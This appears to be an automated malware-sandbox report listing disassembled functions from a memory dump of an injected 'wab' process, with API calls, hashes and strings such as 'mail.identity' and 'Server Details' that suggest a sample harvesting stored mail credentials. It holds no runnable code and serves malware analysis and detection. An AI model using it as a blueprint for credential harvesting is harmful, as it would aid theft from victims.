                                • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: rows deleted
                                • API String ID: 2221118986-571615504
                                • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$memcpy
                                • String ID:
                                • API String ID: 368790112-0
                                • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                APIs
                                • __allrem.LIBCMT ref: 00425850
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                • __allrem.LIBCMT ref: 00425933
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                • String ID:
                                • API String ID: 1992179935-0
                                • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                APIs
                                Strings
                                • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                • too many SQL variables, xrefs: 0042C6FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                • API String ID: 2221118986-515162456
                                • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                APIs
                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                • memset.MSVCRT ref: 004026AD
                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                  • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                • LocalFree.KERNEL32(?), ref: 004027A6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                • String ID:
                                • API String ID: 1593657333-0
                                • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                APIs
                                • memset.MSVCRT ref: 0040C922
                                • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Message$MenuPostSendStringmemset
                                • String ID:
                                • API String ID: 3798638045-0
                                • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                APIs
                                  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                • strlen.MSVCRT ref: 0040B60B
                                • atoi.MSVCRT ref: 0040B619
                                • _mbsicmp.MSVCRT ref: 0040B66C
                                • _mbsicmp.MSVCRT ref: 0040B67F
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbsicmp$??2@??3@atoistrlen
                                • String ID:
                                • API String ID: 4107816708-0
                                • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                • String ID:
                                • API String ID: 1886415126-0
                                • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen
                                • String ID: >$>$>
                                • API String ID: 39653677-3911187716
                                • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                APIs
                                • strlen.MSVCRT ref: 0040797A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040799A
                                  • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                  • Part of subcall function 00406F30: memcpy.MSVCRT ref: 00406F64
                                  • Part of subcall function 00406F30: ??3@YAXPAX@Z.MSVCRT ref: 00406F6D
                                • ??3@YAXPAX@Z.MSVCRT ref: 004079BD
                                • memcpy.MSVCRT ref: 004079DD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                • Opcode ID: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                • Instruction ID: 28856836b01dc1c1490a34e4127c9d88e875caa212a522c6554fbe506b42c8ef
                                • Opcode Fuzzy Hash: defd1bd1be5bbd5284309495682469d6dd103d7cb5d76ad0db5bff9d1363c284
                                • Instruction Fuzzy Hash: A211CDB1604600EFD720DF18D880E9AB7F5EF48328B108A2EE852A76D1C735F8158B59
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _strcmpi
                                • String ID: C@$mail.identity
                                • API String ID: 1439213657-721921413
                                • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                APIs
                                • memset.MSVCRT ref: 00406640
                                  • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                  • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                • memcmp.MSVCRT ref: 00406672
                                • memcpy.MSVCRT ref: 00406695
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset$memcmp
                                • String ID: Ul@
                                • API String ID: 270934217-715280498
                                • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                APIs
                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                  • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                • sprintf.MSVCRT ref: 0040B929
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                • sprintf.MSVCRT ref: 0040B953
                                • _mbscat.MSVCRT ref: 0040B966
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 203655857-0
                                • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                APIs
                                  • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                Strings
                                • recovered %d pages from %s, xrefs: 004188B4
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                • String ID: recovered %d pages from %s
                                • API String ID: 985450955-1623757624
                                • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _ultoasprintf
                                • String ID: %s %s %s
                                • API String ID: 432394123-3850900253
                                • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                APIs
                                • memset.MSVCRT ref: 00409919
                                • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSendmemset
                                • String ID: N\@
                                • API String ID: 568519121-3851889168
                                • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                APIs
                                • LoadMenuA.USER32(00000000), ref: 00409078
                                • sprintf.MSVCRT ref: 0040909B
                                  • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                  • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                  • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                  • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                  • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                  • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                • String ID: menu_%d
                                • API String ID: 1129539653-2417748251
                                • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                APIs
                                Strings
                                • failed memory resize %u to %u bytes, xrefs: 00411706
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _msizerealloc
                                • String ID: failed memory resize %u to %u bytes
                                • API String ID: 2713192863-2134078882
                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                APIs
                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                • strrchr.MSVCRT ref: 00409808
                                • _mbscat.MSVCRT ref: 0040981D
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileModuleName_mbscatstrrchr
                                • String ID: _lng.ini
                                • API String ID: 3334749609-1948609170
                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                APIs
                                • _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                • _mbscat.MSVCRT ref: 004070FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$_mbscpystrlen
                                • String ID: sqlite3.dll
                                • API String ID: 1983510840-1155512374
                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                APIs
                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString
                                • String ID: A4@$Server Details
                                • API String ID: 1096422788-4071850762
                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FreeLocalmemcpymemsetstrlen
                                • String ID:
                                • API String ID: 3110682361-0
                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14